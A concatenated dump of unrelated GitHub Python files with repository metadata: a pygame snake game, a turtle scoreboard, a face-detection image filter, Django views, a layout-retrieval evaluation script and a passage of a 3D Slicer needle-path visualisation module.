elif dx == 0 and dy == 1:
self.body.append(Cube((tail.pos[0], tail.pos[1] - 1))) # Down
elif dx == 0 and dy == -1:
self.body.append(Cube((tail.pos[0], tail.pos[1] + 1))) # Up
self.body[-1].dirnx = dx
self.body[-1].dirny = dy
def draw(self, surface):
for i, c in enumerate(self.body):
if i == 0:
c.draw(surface, True)
else:
c.draw(surface)
def draw_grid(width, rows, surface):
size_between = width // rows
x = 0
y = 0
for line in range(rows):
x += size_between
y += size_between
# Draw lines for each iteration of loop
pygame.draw.line(surface, (255,255,255), (x,0), (x, width)) # vertical line
pygame.draw.line(surface, (255, 255, 255), (0, y), (width, y)) # horizontal line
def redraw_window(surface):
global rows, width, s, snack
surface.fill((0, 0, 0))
s.draw(surface)
snack.draw(surface)
draw_grid(width, rows, surface)
pygame.display.update()
def random_snack(rows, item):
positions = item.body
while True:
x = random.randrange(rows)
y = random.randrange(rows)
# Checking if positions are == current position of snake from a filtered list
# Making sure the snack will not be inside of current snake
if len(list(filter(lambda z:z.pos == (x,y), positions))) > 0: # will continue if (values are == to positions) and
continue # greater than 0 using filter and lambda function
else:
break
return (x,y)
def main():
global width, rows, s, snack
pygame.init()
pygame.display.set_caption("Snake")
width = 500
rows = 20
win = pygame.display.set_mode((width, width))
flag = True
# Starting in the middle
s = Snake((255, 0, 0), (10, 10))
snack = Cube(random_snack(rows, s), color = (0,255,0))
clock = pygame.time.Clock()
while flag:
# Delaying the game so it's not as fast
pygame.time.delay(50)
clock.tick(10) # limiting to 10 fps
s.move()
if s.body[0].pos == snack.pos:
s.add_cube()
snack = Cube(random_snack(rows, s), color = (0,255,0))
# Checking for the collision
for i in range(len(s.body)):
# Using map to apply function lambda (variable z) to each item in s.body list
if s.body[i].pos in list(map(lambda z:z.pos, s.body[i + 1:])):
print("Score:", len(s.body))
flag = False
redraw_window(win)
main()
|
[
"kevinavila32@gmail.com"
] |
kevinavila32@gmail.com
|
947921228a07d1818a52f9c16c3e1ce5adc60daa
|
1fe1ee2f53c004f804e9fe69e6615d3897b63615
|
/Snake/scoreboard.py
|
09ce5b4d4a78cabf6605f7dc4adb6329f392d0ca
|
[] |
no_license
|
jguillermo19/Python_Codigos
|
396083da6d807a5af6170b6b7e52537ab530754a
|
b48ebfacacab79c9390a9119992d76ebb10ffbc1
|
refs/heads/main
| 2023-08-18T23:23:45.932209
| 2021-09-15T20:47:44
| 2021-09-15T20:47:44
| 402,956,446
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 798
|
py
|
from turtle import Turtle
ALIGNMENT = "center"
FONT = ("Courier",15,"normal")
class Scoreboard(Turtle):
def __init__(self):
super().__init__()
self.score = 0
self.color("white")
self.penup() # Don't draw a line
self.goto(0,270) # Position
self.hideturtle() # Hide the turtle cursor
self.update_scoreboard()
def update_scoreboard(self): # Update the score display
self.write(f"Score {self.score}",align=ALIGNMENT,font=FONT)
def game_over(self): # Game over
self.goto(0,0)
self.write("GAME OVER",align=ALIGNMENT,font=FONT)
def increase_score(self): # Increase the score
self.score += 1
self.clear()
self.update_scoreboard()
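# A minimal usage sketch (assumed, not part of this file): the class is
# meant to be driven by a game loop that owns a turtle Screen, e.g.:
# from turtle import Screen
# screen = Screen()
# screen.bgcolor("black")
# scoreboard = Scoreboard()
# scoreboard.increase_score() # clears and redraws "Score 1" at the top
# scoreboard.game_over() # writes "GAME OVER" at the centre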
|
[
"jsandovalh1500@alumno.ipn.mx"
] |
jsandovalh1500@alumno.ipn.mx
|
e7df89bb363a64317c365f5f45a13d4c5a2e4096
|
a6c40c08da73bb1c65b48ce62ab6d035aa22fb41
|
/cleaner.py
|
bf4b23c67d8b90905f2535e876ce701dd078ceaa
|
[] |
no_license
|
SebasGarcia08/face-extractor
|
f279915a21fce2170f0b266378da10f7626c94a7
|
d999518b27a19b149b43be494ec68578c38ab033
|
refs/heads/master
| 2022-11-04T20:19:15.528249
| 2020-06-10T15:55:30
| 2020-06-10T15:55:30
| 269,957,990
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,456
|
py
|
from argparse import ArgumentParser
import insightface
import cv2
import os
import logging
import traceback
import shutil
from tqdm import tqdm, tqdm_gui
import time
import numpy as np
import tensorflow as tf
from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from tensorflow.keras.preprocessing.image import img_to_array
import multiprocessing
from multiprocessing import Pool
from p_tqdm import p_map
import sys
def main(args):
logging.info(' Reading files in {}'.format(args["INPUT_BASE_DIR"]))
if not args["save_in_same_output_folder"]:
copyDirectoryStructure(args["INPUT_BASE_DIR"], args["OUTPUT_PATH"])
else:
if os.path.exists(args["OUTPUT_PATH"]):
logging.error(" {} path already exists".format(args["OUTPUT_PATH"]))
return
else:
os.mkdir(args["OUTPUT_PATH"])
try:
if os.path.exists(args["INPUT_BASE_DIR"]):
num_imgs = 0
num_faces_detected = 0
num_images_filtered = 0
num_masked_faces_detected = 0
for dirpath, _, filenames in os.walk(args["INPUT_BASE_DIR"]):
for filename in filenames:
num_imgs += 1
pbar = tqdm(total=num_imgs, desc="Progress", unit="Images")
pbar.write(f"{num_imgs} images found")
for img_number, (dirpath, _, filenames) in enumerate(os.walk(args["INPUT_BASE_DIR"])):
for filename in filenames:
try:
partialPath = os.path.sep.join([ dirpath[ len(args["INPUT_BASE_DIR"]): ], filename ])
src = os.path.sep.join([args["INPUT_BASE_DIR"], partialPath])
img = cv2.imread(src)
img = cv2.resize(img, (255, 255))
bbox, _ = model.detect(img, threshold=0.5, scale=1.0)
if len(bbox) > 0:
num_images_filtered += 1
if args["save_in_same_output_folder"]:
out = os.path.sep.join([args["OUTPUT_PATH"], filename])
else:
out = os.path.sep.join([args["OUTPUT_PATH"], partialPath])
if args["keep_only_imgs_with_faces"]:
if args["move_images"]:
shutil.move(src, out)
else:
cv2.imwrite(out, img)
elif args["crop_faces"] or args["keep_only_imgs_with_masked_faces"]:
current_num_faces_detected = 0
faces = []
croppedImages = []
for box in bbox:
try:
if args["keep_only_imgs_with_masked_faces"]:
x,y,w,h,_ = list(map(int, box))
imgCrop = img[y:y+h,x:x+w]
croppedImages.append(imgCrop)
face = cv2.cvtColor(imgCrop, cv2.COLOR_BGR2RGB)
face = cv2.resize(face, (224, 224))
face = img_to_array(face)
face = preprocess_input(face)
face = np.expand_dims(face, axis=0)
faces.append(face)
except Exception as e:
# logging.error(traceback.format_exc())
pbar.write(traceback.format_exc())
saveImg = True
if len(faces) > 0:
preds = maskNet.predict(faces)
for i, (imgCrop, pred) in enumerate(zip(croppedImages, preds)):
# Build each face's output path in its own variable; `out` is reused
# below when saving the original image, so it must not be mutated here
face_out = out.replace(".jpg", "") + f"face_No{i + 1}.jpg"
saveCroppedImg = True
if args["crop_faces"]:
if args["keep_only_imgs_with_masked_faces"]:
pMask, pNotMask = np.squeeze(pred)
saveCroppedImg = pMask > .3
if saveCroppedImg:
try:
imgCrop = cv2.resize(imgCrop, (224, 224)) # this resizing could raise an exception
cv2.imwrite(face_out, imgCrop)
num_faces_detected += 1
current_num_faces_detected += 1
except Exception:
try:
cv2.imwrite(face_out, imgCrop) # if so, then save the image as is, without resizing
num_faces_detected += 1
current_num_faces_detected += 1
except Exception as e:
pbar.write(str(e))
else:
saveImg = False
if args["duplicate_img_of_faces"]:
if args["keep_only_imgs_with_masked_faces"]:
if len(faces) == 1 and saveImg:
if args["move_images"]:
shutil.move(src, out)
else:
cv2.imwrite(out, img)
else:
if args["move_images"]:
shutil.move(src, out)
else:
cv2.imwrite(out, img)
if args["crop_faces"]:
s = " masked" if args["keep_only_imgs_with_masked_faces"] else " "
msg = f"Detected{s} faces: {current_num_faces_detected} - Total: {num_faces_detected} - Percentage of faces over images: {(num_faces_detected/(img_number+1))*100}%"
pbar.write(msg)
else:
pbar.write(f"Filtered images: {num_images_filtered} - Percentage of saved images: {(num_images_filtered/(img_number+1))*100}%")
pbar.update(1)
except Exception as e:
pbar.write(str(e))
else:
raise FileNotFoundError("Path does not exists")
except Exception as e:
logging.log(40, traceback.format_exc())
def yieldPaths(input_path, output_path, flat=False):
for dirpath, _, filenames in os.walk(input_path):
for filename in filenames:
partialPath = os.path.sep.join([ dirpath[ len(input_path): ], filename])
src = os.path.sep.join([input_path, partialPath])
if flat:
out = os.path.sep.join([output_path, filename])
else:
out = os.path.sep.join([output_path, partialPath])
yield (src, out)
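# A hypothetical usage sketch: yieldPaths mirrors the directory walk in
# main(), pairing each source file with its destination path.
# for src, out in yieldPaths("Data/raw", "Data/filtered", flat=True):
#     print(src, "->", out)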
def copyDirectoryStructure(base_path, output_path):
if os.path.exists(base_path):
res = "yes"
for dirpath, _ , _ in os.walk(base_path):
structure = os.path.sep.join([ output_path, dirpath[ len(base_path): ] ])
try:
logging.info(" Creating {} path".format(structure))
if res == "yesAll":
os.makedirs(structure, exist_ok=True)
else:
os.mkdir(structure)
except FileExistsError:
msg = "Path {} already exists, do you want to overwrite it? [yes/no/yesAll/noAll]: ".format(structure)
res = input(msg)
if res == "noAll":
break
if res != "yes" and res != "no" and res != "yesAll" and res != "noAll":
print("Invalid choice")
break
else:
logging.error("File does not exists")
def copyFile(src, dst, buffer_size=10485760, perserveFileDate=True):
'''
From: https://blogs.blumetech.com/blumetechs-tech-blog/2011/05/faster-python-file-copy.html
Copies a file to a new location. Much faster performance than Apache Commons due to use of larger buffer
@param src: Source File
@param dst: Destination File (not file path)
@param buffer_size: Buffer size to use during copy
@param perserveFileDate: Preserve the original file date
'''
# Check to make sure destination directory exists. If it doesn't create the directory
dstParent, dstFileName = os.path.split(dst)
if(not(os.path.exists(dstParent))):
os.makedirs(dstParent)
# Optimize the buffer for small files
buffer_size = min(buffer_size,os.path.getsize(src))
if(buffer_size == 0):
buffer_size = 1024
if shutil._samefile(src, dst):
raise shutil.Error("`%s` and `%s` are the same file" % (src, dst))
for fn in [src, dst]:
try:
st = os.stat(fn)
except OSError:
# File most likely does not exist
pass
else:
# XXX What about other special files? (sockets, devices...)
if shutil.stat.S_ISFIFO(st.st_mode):
raise shutil.SpecialFileError("`%s` is a named pipe" % fn)
with open(src, 'rb') as fsrc:
with open(dst, 'wb') as fdst:
shutil.copyfileobj(fsrc, fdst, buffer_size)
if(perserveFileDate):
shutil.copystat(src, dst)
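# A minimal usage sketch (paths are hypothetical): copies with a 10 MB
# buffer by default, shrinks the buffer for small files, and preserves
# the original timestamps.
# copyFile("Data/raw/img_0001.jpg", "Data/filtered/img_0001.jpg")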
def countImages(input_path):
total_images = 0
for _, _, filenames in os.walk(input_path):
total_images += len(filenames)
return total_images
def write(msg):
sys.stderr.write('\r{}'.format(msg))
def run(src, out, model, move_files, num_filtered_images, img_number):
# Self-contained per-image filtering step: detect faces and, when at
# least one is found, keep the image by moving it or buffer-copying it.
try:
img = cv2.imread(src)
img = cv2.resize(img, (255, 255))
bbox, _ = model.detect(img, threshold=0.5, scale=1.0)
if len(bbox) > 0:
if move_files:
shutil.move(src, out)
else:
copyFile(src, out)
num_filtered_images += 1
ratio = round((num_filtered_images / (img_number + 1)) * 100, 3)
write("Filtered imgs: {}| % Imgs saved: {}".format(num_filtered_images, ratio))
except Exception as e:
write(str(e))
return num_filtered_images
def filterFace():
pass
if __name__ == '__main__':
# Initialize parser
parser = ArgumentParser(
description="Script for detecting faces in a given folder and its subdirectories"
)
parser.add_argument("-in", "--input-path",
type=str,
required=True,
dest="INPUT_BASE_DIR",
help="Path to the directory where images or folders of images are\n")
parser.add_argument("-out","--output-path",
type=str,
required=True,
dest = "OUTPUT_PATH",
help="Path of the folder where faces images will be saved\n")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("--keep-faces",
action="store_true",
dest="keep_only_imgs_with_faces",
help = "Set the keeping criteria to images with faces. Whether to keep images stored from [-out, --output-path] to [-in, --input-path] only if contain faces")
group.add_argument("--keep-faces-with-mask",
action="store_true",
dest="keep_only_imgs_with_masked_faces",
help = "Set the keeping criteria to images with faces that wear mask. Whether to keep images stored from [-out, --output-path] to [-in, --input-path] only if contain faces with mask")
parser.add_argument("-move", "--move-kept-images",
action="store_true",
default=False,
dest = "move_images",
help = "Whether to move kept images from [-in, --input-path] to [-out, --output-path] in such a way that in the remaining images in [-in --input-path] are the ones that did not apply the criteria.")
parser.add_argument("-crop","--crop-faces",
action='store_true',
dest="crop_faces",
default=False,
help="Crop faces detected in images and save each one\n")
parser.add_argument("-flat", "--same-out-dir",
action='store_true',
dest="save_in_same_output_folder",
default=False,
help="Whether to save all images in the directory specified in -out --output-path and not imitate the directory structure of the path specified in -in --input-path\n")
parser.add_argument("-duplicate", "--duplicate-img-faces",
action="store_true",
dest="duplicate_img_of_faces",
default=False,
help="Whether to save the original images of the extracted faces also. Only valid if -crop --crop-faces is passed as argument")
parser.add_argument("-model", "--classification-model",
type=str,
dest = "classification_model",
default="resources/model_with_1400_masked_samples.h5")
kwargs = vars(parser.parse_args())
logging.basicConfig(level=logging.INFO)
logging.info(" Preparing model...")
model = insightface.model_zoo.get_model('retinaface_r50_v1')
model.prepare(ctx_id = -1, nms=0.4)
if kwargs["keep_only_imgs_with_masked_faces"]:
logging.info(" Loading classification model...")
maskNet = tf.keras.models.load_model(kwargs["classification_model"], compile=False)
main(kwargs)
|
[
"segaracos@outlook.com"
] |
segaracos@outlook.com
|
cef0851b730719e6ec2ecdb6c1260034484790a2
|
ce6df0cd2a21fd98d2a58793816f8be09658c73a
|
/loop.py
|
98c95cd9761441e221a66e2e76c2e57395b90e8e
|
[] |
no_license
|
MikeTheFyke/Python
|
5ee6de684a0985fb28829da16982fe039884426e
|
5fde6be8e8f1c5b90028a5dcd5f39bc149cdaca4
|
refs/heads/master
| 2021-01-05T09:00:08.564586
| 2020-03-03T21:47:05
| 2020-03-03T21:47:05
| 240,965,364
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,517
|
py
|
rockosML = [
"Rocko Rama",
"Spunky",
"Heffer Wolfe",
"Ed BigHead",
"Bev BigHead",
"Filburt Turtle",
"Earl The Dog",
"Paula Hutchison"
]
print("\n--This is the start of the list--")
# In Python, indentation defines where a for loop's body ends.
for name in rockosML:
print(name)
print("---This is the end of the list---\n")
# Mass uppercasing: using the append method to save changed data into a new list
print("\nThe same list but all in CAPS\n")
upperNames = []
for name in rockosML:
name = name.upper()
upperNames.append(name)
print(upperNames)
print("\n ---The End Is Here--- \n")
# Directions Loop
print("\nLet's Get You Moving\n")
directions = [
"turn left",
"go straight",
"turn right",
"keep going until you see the dog statue",
"turn right",
"turn right again",
"park right on the sidewalk"
]
instructions = "First "
for nextDirection in directions:
instructions = instructions + nextDirection + ", then \n"
print(instructions + "\nYou Have Arrived :)\n")
# Bacteria Loop using the range method, 10 iterations in my example
# using time.sleep method to create a pause between iterations.
print("\nWelcome to The Bacteria Zone\n")
# imported time method
import time
bacteria = "&"
generations = 10
for generation in range(0, generations):
# bacteria = bacteria + bacteria - replaced to show strings can be multiplied
bacteria = bacteria * 2
print(bacteria)
time.sleep(0.5)
print("\nThank You Come Again\n")
|
[
"mikefyke@hotmail.com"
] |
mikefyke@hotmail.com
|
21c08f1cc6e33c90dd171f8ca67a5a0a1ef54b06
|
4f2dd2feb3d7a62c382534a563e4d823a324e5d9
|
/src/imgUpload/views.py
|
3038919b64f4ecdd9fa25f5b24356148eed74dc9
|
[
"MIT"
] |
permissive
|
codezerro/Django-Dev-To-Development-2
|
fc727d72fea3af19e15bc42429a50e159760252b
|
5e0780d2bdd8d3c5526a7cf813b14216336ed5f2
|
refs/heads/master
| 2022-12-21T23:29:35.655252
| 2020-09-22T02:31:49
| 2020-09-22T02:31:49
| 296,371,171
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 149
|
py
|
from django.shortcuts import render
# Create your views here.
def imgCompress(request):
return render(request, 'imgupload/index.html')
|
[
"kabircp08@gmail.com"
] |
kabircp08@gmail.com
|
c4ce2e6ba48d68bd21ff577fd3d57c7571c05689
|
50e6d7c4f7c3fe5127f4cc4634d6e9acdf8f5e17
|
/evaluate_cpu_only.py
|
cb4b463f79c79755652b1a74c1effe49460c817c
|
[
"MIT"
] |
permissive
|
Tiamat-Tech/gcn-cnn
|
907500a2cd4b42a1d5e43192b1b09956db02ccbd
|
6f9c685dd9ac9567746aa1904e549ecc00a7a712
|
refs/heads/master
| 2023-03-17T17:06:54.800458
| 2021-03-09T19:30:09
| 2021-03-09T19:30:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,552
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 20 11:01:07 2019
Compute the performance metrics for graphencoder model
performance metrics includes iou, pixelAccuracy
@author: dipu
"""
import torch
from torchvision import transforms
import torch.nn.functional as F
import pickle
from scipy.spatial.distance import cdist
import numpy as np
import init_paths
from dataloaders.dataloader_test_2 import *
from dataloaders.dataloader_test_2 import RICO_ComponentDataset
import models
import opts_dml
import os
from BoundingBox import BoundingBox
from BoundingBoxes import BoundingBoxes
from utils import mkdir_if_missing, load_checkpoint
from eval_metrics.get_overall_Classwise_IOU import get_overall_Classwise_IOU
from eval_metrics.get_overall_pix_acc import get_overall_pix_acc
def main():
opt = opts_dml.parse_opt()
os.environ["CUDA_VISIBLE_DEVICES"] = opt.gpu_id
onlyGallery = True
opt.use_directed_graph = True
opt.decoder_model = 'strided'
opt.dim = 1024
boundingBoxes = getBoundingBoxes_from_info()
model_file = 'trained_models/model_dec_strided_dim1024_ep35.pth'
data_transform = transforms.Compose([ # Not used for 25Channel_images
transforms.Resize([255,127]),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
model = models.create(opt.decoder_model, opt)
#resume = load_checkpoint(model_file)
resume = torch.load(model_file, map_location=torch.device('cpu'))
model.load_state_dict(resume['state_dict'])
#model = model.cuda()
model.eval()
loader = RICO_ComponentDataset(opt, data_transform)
q_feat, q_fnames = extract_features(model, loader, split='query')
g_feat, g_fnames = extract_features(model, loader, split='gallery')
if not(onlyGallery):
t_feat, t_fnames = extract_features(model, loader, split='train')
g_feat = np.vstack((g_feat,t_feat))
g_fnames = g_fnames + t_fnames
q_feat = np.concatenate(q_feat)
g_feat = np.concatenate(g_feat)
distances = cdist(q_feat, g_feat, metric= 'euclidean')
sort_inds = np.argsort(distances)
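# sort_inds[i] ranks every gallery item for query i by ascending
# euclidean distance, so e.g. g_fnames[sort_inds[0][0]] (hypothetical
# indexing) is the gallery layout closest to the first query.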
overallMeanClassIou, _, _ = get_overall_Classwise_IOU(boundingBoxes,sort_inds,g_fnames,q_fnames, topk = [1,5,10])
overallMeanAvgPixAcc, _, _ = get_overall_pix_acc(boundingBoxes,sort_inds,g_fnames,q_fnames, topk = [1,5,10])
print('The overallMeanClassIou = ' + str([ '{:.3f}'.format(x) for x in overallMeanClassIou]) + '\n')
print('The overallMeanAvgPixAcc = ' + str([ '{:.3f}'.format(x) for x in overallMeanAvgPixAcc]) + '\n')
def extract_features(model, loader, split='gallery'):
epoch_done = False
feat = []
fnames = []
c=0
torch.set_grad_enabled(False)
while epoch_done == False:
c+=1
data = loader.get_batch(split)
sg_data = {key: torch.from_numpy(data['sg_data'][key]) for key in data['sg_data']}
x_enc, x_dec = model(sg_data)
x_enc = F.normalize(x_enc)
outputs = x_enc.detach().cpu().numpy()
feat.append(outputs)
fnames += [x['id'] for x in data['infos']]
if data['bounds']['wrapped']:
#print('Extracted features from {} images from {} split'.format(c, split))
epoch_done = True
print('Extracted features from {} images from {} split'.format(len(fnames), split))
return feat, fnames
# prepare bounding boxes information for RICO dataset
def getBoundingBoxes_from_info(info_file = 'data/rico_box_info.pkl'):
allBoundingBoxes = BoundingBoxes()
info = pickle.load(open(info_file, 'rb'))
#files = glob.glob(data_dir+ "*.json")
for imageName in info.keys():
count = info[imageName]['nComponent']
for i in range(count):
box = info[imageName]['xywh'][i]
bb = BoundingBox(
imageName,
info[imageName]['componentLabel'][i],
box[0],
box[1],
box[2],
box[3],
iconClass=info[imageName]['iconClass'],
textButtonClass=info[imageName]['textButtonClass'])
allBoundingBoxes.addBoundingBox(bb)
print('Collected {} bounding boxes from {} images'. format(allBoundingBoxes.count(), len(info) ))
# testBoundingBoxes(allBoundingBoxes)
return allBoundingBoxes
#%%
if __name__ == '__main__':
main()
|
[
"dips4717@gmail.com"
] |
dips4717@gmail.com
|
187daa4d61a1ac611a58cbcbda03db4114656f11
|
ea71a043e78c2fcbf1e9a39ff11eb39c699edd63
|
/core/views.py
|
4697547485e970b1daab5211e1a32ce427e7ff05
|
[] |
no_license
|
wellvsilva/djangoecommerce
|
fcce49c57def11480b66187ed0343a3b552f81ec
|
1bd9edcc5bd28f3a2721a489d389ef17efd343c7
|
refs/heads/master
| 2021-01-11T04:40:27.050588
| 2016-10-17T14:08:50
| 2016-10-17T14:08:50
| 71,141,786
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 307
|
py
|
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def index(request):
return render(request, 'index.html')
def contact(request):
return render(request, 'contact.html')
#def product_list(request):
# return render(request, 'product_list.html')
|
[
"wellvsilva.programador@gmail.com"
] |
wellvsilva.programador@gmail.com
|
a8ac5edd27c7ac2656e13272e14dc4959808b147
|
d4f7457a15472788821c31f3ffbbefc620e7984d
|
/student/migrations/0013_alter_project_upload_images.py
|
04373a559a4e521a42d067291e21dee28c0666b7
|
[] |
no_license
|
shashiprajj/Resume_master
|
9d3a48650d66b0912742676ada41810274f2b8e3
|
3acc94b0bb5dd140ea1ecc2fba2550ef71a556ef
|
refs/heads/master
| 2023-07-02T15:14:18.578101
| 2021-08-07T20:21:21
| 2021-08-07T20:21:21
| 393,724,046
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 433
|
py
|
# Generated by Django 3.2.3 on 2021-05-30 16:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('student', '0012_alter_project_upload_images'),
]
operations = [
migrations.AlterField(
model_name='project',
name='upload_images',
field=models.FileField(blank=True, null=True, upload_to='projects'),
),
]
|
[
"shashiprajj@gmail.com"
] |
shashiprajj@gmail.com
|
2d8682112e73378bda15b48f3f96e82f212dda8b
|
96e2c852ce0ba975affacc90e31037dd3982ed4b
|
/BestPathVisualization/BestPathVisualizationLib/logic.py
|
0480871de29e0fdeecaad1423d664039cdf113d8
|
[] |
no_license
|
StefanTUHH/robotic_needle_insertion
|
9d5c3883f36ce325952e08b130bc355028ad1578
|
0b54ebcf97a0946ec3ba99cfbaef1d471482c9d5
|
refs/heads/master
| 2023-07-10T12:04:53.801630
| 2021-09-01T07:08:34
| 2021-09-01T07:08:34
| 400,170,804
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 33,514
|
py
|
import sys
from itertools import compress
from typing import Optional
from numpy import linalg
import time
from multiprocessing import Process, cpu_count, Queue
from . import overlay
from .slicer_convenience_lib import *
try:
import sklearn
from scipy.spatial import ConvexHull
except ImportError:
slicer.util.pip_install("scipy==1.5.2")
slicer.util.pip_install("sklearn")
import sklearn
from scipy.spatial import ConvexHull
try:
import pyvista as pv
except ImportError:
slicer.util.pip_install("pyvista")
import pyvista as pv
# BestPathVisualizationLogic
#
class BestPathVisualizationLogic(ScriptedLoadableModuleLogic):
"""This class should implement all the actual
computation done by your module. The interface
should be such that other python code can import
this class and make use of the functionality without
requiring an instance of the Widget.
Uses ScriptedLoadableModuleLogic base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
T0, T1, T2, T3, T4 = 0, 0, 0, 0, 0
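# A minimal construction sketch (all values below are illustrative
# assumptions, not defaults from this module):
# logic = BestPathVisualizationLogic(maxDistance=150., imageThreshold=-300.,
#                                    colorbarValue=2000., discreetStepsValue=10.,
#                                    socketReceiveSend=None, matrix=vtk.vtkMatrix4x4())
# logic.runSegment(inputVolume, outputModel, targetNode)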
def __init__(self, maxDistance, imageThreshold, colorbarValue, discreetStepsValue, socketReceiveSend, matrix):
self.segmentEditorNode = None
self.segmentationNode = None
self.updateCallback = None
self.doneCallback = None
self.cancel = False
self.outputPath = None
self.useHoleFilling = False
self.maxDistance = maxDistance
self.imageThreshold = imageThreshold
self.initTransform = True
self.socketReceiveSend = socketReceiveSend
self.matrix = matrix
self.colorbarValue = colorbarValue
self.discreetStepsValue = discreetStepsValue
self.arrShape = None
self.overlayTypeIndex = 0
self.maxKernelSize = 0
self.distanceWeighting = None
self.angleWeighting = None
self.gantry_pose = np.asarray(
((1., 0., 0., -1000.,), (0., 1., 0., -1000.,), (0., 0., 1., 1390.,), (0., 0., 0., 1.,)))
self.scalarData = None
self.scalarDataMoveIt = None
self.targetGlobal = [0, 0, 0]
self.targetPoint = [0, 0, 0]
def runSegment(self, inputVolume, outputModel, targetNode):
"""
Run the actual algorithm
"""
if not self.isValidInputOutputData(inputVolume, outputModel, targetNode):
return False
logging.info('Processing started')
npArrPoly = arrayFromModelPoints(outputModel)
if len(npArrPoly) == 0:
start_A = time.time()
self.segmentSkin(inputVolume, outputModel)
end_A = time.time()
self.T0 = end_A - start_A
npArrPoly = arrayFromModelPoints(outputModel)
else:
logging.info("Using previously segmented skin model")
self.initWithPreviousModel(inputVolume, outputModel)
ret = self.addOverlay(outputModel, targetNode)
if ret is None:
return False
indices, insideTransformed = ret
relevantPoints = np.asarray(self.scalarData)[indices] < self.globalMaxDensity
if len(relevantPoints) > 0 and not self.applyMaxKernel(np.asarray(indices)[relevantPoints],
insideTransformed[relevantPoints, :]):
return False
combinedArray = np.zeros((len(npArrPoly) + 1, 4), dtype=float)
combinedArray[0, :3] = self.targetGlobal
combinedArray[1:, :3] = npArrPoly
combinedArray[1:, 3] = self.scalarData
combinedArrayMoveIt, foundInfeasiblePosition = self.applyReachability(combinedArray, npArrPoly)
self.writeOutput(targetNode, combinedArray, combinedArrayMoveIt)
self.displayResults(combinedArrayMoveIt is not None, npArrPoly, outputModel, foundInfeasiblePosition)
logging.info('Processing completed')
if self.waypoint(100):
return False
return True
@staticmethod
def np_matrix_from_vtk(vtk_matrix):
result = np.eye(4)
for r in range(4):
for c in range(4):
result[r, c] = vtk_matrix.GetElement(r, c)
return result
def applyReachability(self, combinedArray, npArrPoly):
# Check if Points are reachable by MoveIt
combinedArrayMoveItIn = np.delete(combinedArray, 0, 0)
combinedArrayMoveIt = None
foundInfeasiblePosition = False
if self.socketReceiveSend is not None:
if self.waypoint(95, "Checking Map with MoveIt"):
# The caller unpacks two values, so cancellation must return a pair
return None, False
tf_matrix = self.np_matrix_from_vtk(self.matrix)
self.applyGantryMesh(tf_matrix)
self.applyCollisionMesh(npArrPoly)
start_E = time.time()
combinedArrayMoveIt = self.checkMoveIt(combinedArrayMoveItIn)
end_E = time.time()
self.T4 = end_E - start_E
moveItBool = combinedArrayMoveIt[:, 4]
# Create VTK Color Map
self.scalarDataMoveIt = vtk.vtkFloatArray()
self.scalarDataMoveIt.SetNumberOfComponents(0)
self.scalarDataMoveIt.SetNumberOfValues(len(npArrPoly))
self.scalarDataMoveIt.SetName("density")
toAdd = int(np.ceil((self.colorbarValue - self.globalMinDensity) / 256))
not_reachable = moveItBool == 1
np.asarray(self.scalarDataMoveIt)[~not_reachable] = combinedArray[
np.add(np.where(~not_reachable), 1), 3].flatten()
if np.any(not_reachable):
foundInfeasiblePosition = True
np.asarray(self.scalarDataMoveIt)[not_reachable] = self.globalMaxDensity + toAdd
logging.info("Finished with MoveIT")
return combinedArrayMoveIt, foundInfeasiblePosition
def writeOutput(self, targetNode, combinedArray, combinedArrayMoveIt: Optional = None):
if self.outputPath is not None and self.outputPath != '':
string_path = self.outputPath.split('.')
targetName = targetNode.GetName()
outputPath_ColormapMoveIt = string_path[0] + targetName + '_Rob.txt'
outputPath_Colormap = string_path[0] + targetName + '.txt'
outputPath_ComputationTime = string_path[0] + targetName + '_ComputationTime.txt'
timeEstimation = "time" in outputPath_Colormap
logging.info("Saving result to file {}".format(outputPath_Colormap))
with open(outputPath_Colormap, "w") as f:
np.savetxt(f, combinedArray)
if timeEstimation:
logging.info("Saving Computation Time.")
with open(outputPath_ComputationTime, "w") as f:
np.savetxt(f, [self.T0, self.T1, self.T2, self.T3, self.T4])
if combinedArrayMoveIt is not None:
logging.info("Saving moveit result to file {}".format(outputPath_ColormapMoveIt))
with open(outputPath_ColormapMoveIt, "w") as f:
np.savetxt(f, combinedArrayMoveIt)
def displayResults(self, couldConnectToMoveIt, npArrPoly, outputModel, foundInfeasiblePosition):
if couldConnectToMoveIt:
min_point = npArrPoly[np.argmin(self.scalarDataMoveIt), :]
else:
min_point = npArrPoly[np.argmin(self.scalarData), :]
fixedLRS = slicer.vtkMRMLMarkupsFiducialNode()
fixedLRS.SetName('Opt_Surface')
fixedLRS.AddFiducial(min_point[0], min_point[1], min_point[2])
slicer.mrmlScene.AddNode(fixedLRS)
fixedLRS.SetDisplayVisibility(True)
outputModel.CreateDefaultDisplayNodes()
print("Showing resulting model")
if couldConnectToMoveIt:
outputModel.GetPolyData().GetPointData().AddArray(self.scalarDataMoveIt)
else:
outputModel.GetPolyData().GetPointData().AddArray(self.scalarData)
arrayFromModelPointDataModified(outputModel, "density")
arrayFromModelPointsModified(outputModel)
# Show pretty results
modelDisplayNode = outputModel.GetDisplayNode()
modelDisplayNode.SetActiveScalarName("density")
modelDisplayNode.SetScalarRangeFlag(1)
scalarRange = modelDisplayNode.GetScalarRange()
# Fixes issue when no point is reachable
scalarRange = (min(self.colorbarValue - 1, min(scalarRange[0], np.min(self.scalarData))),
max(scalarRange[1], np.max(self.scalarData)))
newColorSize = int(
